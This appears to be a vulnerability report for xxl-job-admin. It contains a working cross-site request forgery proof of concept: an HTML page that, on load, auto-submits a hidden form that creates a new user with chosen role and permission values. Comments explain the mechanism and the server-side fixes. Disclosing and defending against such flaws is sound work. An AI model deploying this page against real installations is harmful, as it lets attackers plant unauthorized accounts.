
There is a CSRF vulnerability that can add the administrator account #1921

@devi1syd


After the administrator has logged in, have them open the following page.
PoC:
one.html — adds an admin

<html><body>
<script type="text/javascript">
/**
 * Builds a form element in the current document and submits it immediately.
 *
 * Review context: this is a form POST issued from whatever page loads this
 * script. The browser decides which cookies accompany it (subject to their
 * SameSite attribute), so a receiving endpoint cannot treat the presence of
 * a session cookie as proof that the user meant to send the request. The
 * server-side defences are an unpredictable anti-CSRF token bound to the
 * session and/or strict Origin/Referer validation on state-changing routes.
 *
 * @param {string} url    Value assigned to the form's action.
 * @param {string} fields Markup assigned to the form's innerHTML (the
 *                        input elements to submit).
 */
function post(url, fields) {
  const form = Object.assign(document.createElement("form"), {
    action: url,
    innerHTML: fields,
    // "_self": the response replaces the current page rather than opening
    // a new browsing context.
    target: "_self",
    method: "post",
  });

  // A form has to be attached to the document before it can be submitted.
  document.body.appendChild(form);
  form.submit();
}
/**
 * Driver of the reporter's proof of concept: concatenates four hidden form
 * inputs (username, password, role, permission) and passes them to post()
 * together with the user-creation URL of the reporter's test instance.
 *
 * Review context: every value below is a constant chosen by the page author;
 * the request carries no per-session or per-request secret. If the endpoint
 * accepts it, as the report claims, the only thing authenticating the request
 * is the logged-in administrator's cookie. The fix belongs on the server:
 * require an anti-CSRF token (or validate Origin/Referer) on this route and
 * set the session cookie with a restrictive SameSite attribute.
 */
function csrf_hack()
{
// Declared without an initial value, so the first `+=` below yields the
// string "undefined" followed by the markup.
var fields;

fields += "<input type='hidden' name='username' value='test1' />";
fields += "<input type='hidden' name='password' value='test1' />";  
// NOTE(review): what role=0 and permission=1 mean in the application is not
// shown in this report; confirm against the user model when triaging severity.
fields += "<input type='hidden' name='role'    value='0' />";  
fields += "<input type='hidden' name='permission' value='1' />";  


// Reporter's lab address, reproduced exactly as it appears in the report
// (including the space after "172."). Appears to be a private-range host
// reached over plain http.
var url = "http://172. 18.71.41:8090/xxl-job-admin/user/add";
post(url,fields);
}
// Runs the demonstration as soon as the page has finished loading. No click
// or other interaction is needed, which is why the report says that merely
// opening the page while logged in is enough.
window.onload = () => {
  csrf_hack();
};
</script>
</body></html>
